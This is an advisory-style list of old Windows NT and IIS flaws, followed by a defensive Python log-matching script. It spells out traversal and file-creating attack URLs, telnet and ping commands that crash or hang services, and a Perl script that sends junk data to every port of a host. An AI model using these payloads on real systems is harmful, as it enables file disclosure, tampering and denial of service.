Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings on the NTsecurity@iss.net list, to test the ports on your own system (Perl is available from the NT Resource Kit):
/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";   # chat2.pl ships with older Perl distributions

$systemname = shift @ARGV;          # host to test, given on the command line
die "usage: perl poke servername\n" unless $systemname;
$verbose = 1;    # tell me what you're hitting
$knownports = 1; # don't hit known problem ports (53, 135, 1031)
for ($port = 1; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;                 # nothing listening, or connection refused
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr>, will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (causing an effective DoS) or report its current directory location (revealing the directory structure).
--------------------------------------------------------
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and the directory structure of the server.
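A defender-side log check for the request shapes collected in this post (the ..\.. traversal, the '>' redirection into the scripts directory with %0A%0D, and the .ida/.idq path-disclosure and long-dot-run probes), written as an added example that is not part of the original post. It assumes a simplified "METHOD URL STATUS" log layout and runs over constructed sample lines rather than real IIS logs.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in a simplified "METHOD URL STATUS" layout
# (not real IIS logs, and not from the original post); line 7 carries a
# 30-dot run in front of "ida" like the long-URL request described above.
SAMPLE_LOG = "\n".join([
    "GET /default.htm 200",
    "GET /..\\..\\docs\\readme.txt 200",
    "GET /scripts..\\..\\scriptname 200",
    "GET /scripts/exploit.bat>c:\\inetpub\\target.bat 200",
    "GET /scripts/script_name%0A%0D>c:\\target.bat 200",
    "GET /anything.idq 404",
    "GET /" + "." * 30 + "ida 500",
    "GET /products/list.asp?id=3 200",
])

# Each rule is applied to the percent-decoded URL path.
PATTERNS = {
    "dot-dot traversal": re.compile(r"\.\.[\\/]"),
    "redirection in scripts path": re.compile(r"/scripts/[^ ]*>"),
    "CR/LF in script name": re.compile(r"[\r\n]"),
    "idq/ida probe": re.compile(r"\.id[aq](\?|$)", re.I),
    "long dot run before ida": re.compile(r"\.{20,}ida(\?|$)", re.I),
}

def classify(url):
    """Return the names of all rules that match one request URL.
    Decoding first makes %0A%0D and %2e%2e visible to the rules."""
    decoded = unquote(url)
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]

def scan(log_text):
    """Yield (line_no, url, hits) for every log line that trips a rule."""
    for n, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 2:
            continue
        hits = classify(parts[1])
        if hits:
            yield n, parts[1], hits

if __name__ == "__main__":
    for n, url, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {url} -> {', '.join(hits)}")
```

Only the URL field is inspected, so a real deployment would first map the columns of the actual log format onto the METHOD/URL/STATUS layout assumed here.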